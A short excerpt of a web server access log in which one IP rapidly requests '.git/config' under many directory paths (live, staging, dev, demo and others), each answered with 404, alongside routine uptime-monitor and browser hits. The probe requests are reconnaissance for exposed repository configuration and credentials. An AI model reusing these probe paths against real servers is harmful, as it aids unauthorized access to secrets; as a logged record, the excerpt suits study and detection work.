94.23.133.43 - - [03/Mar/2023:20:30:53 +0100] "GET //live/.git/config HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
94.23.133.43 - - [03/Mar/2023:20:30:53 +0100] "GET //staging/.git/config HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
94.23.133.43 - - [03/Mar/2023:20:30:53 +0100] "GET //control/.git/config HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
94.23.133.43 - - [03/Mar/2023:20:30:53 +0100] "GET //dev/.git/config HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
94.23.133.43 - - [03/Mar/2023:20:30:53 +0100] "GET //core/.git/config HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
94.23.133.43 - - [03/Mar/2023:20:30:53 +0100] "GET //trade/.git/config HTTP/1.1" 404 322 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
94.23.133.43 - - [03/Mar/2023:20:30:54 +0100] "GET //web/.git/config HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
94.23.133.43 - - [03/Mar/2023:20:30:55 +0100] "GET //demo/.git/config HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
212.91.246.72 - - [03/Mar/2023:20:31:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [03/Mar/2023:20:31:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Mar/2023:20:32:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:20:33:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [03/Mar/2023:20:33:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
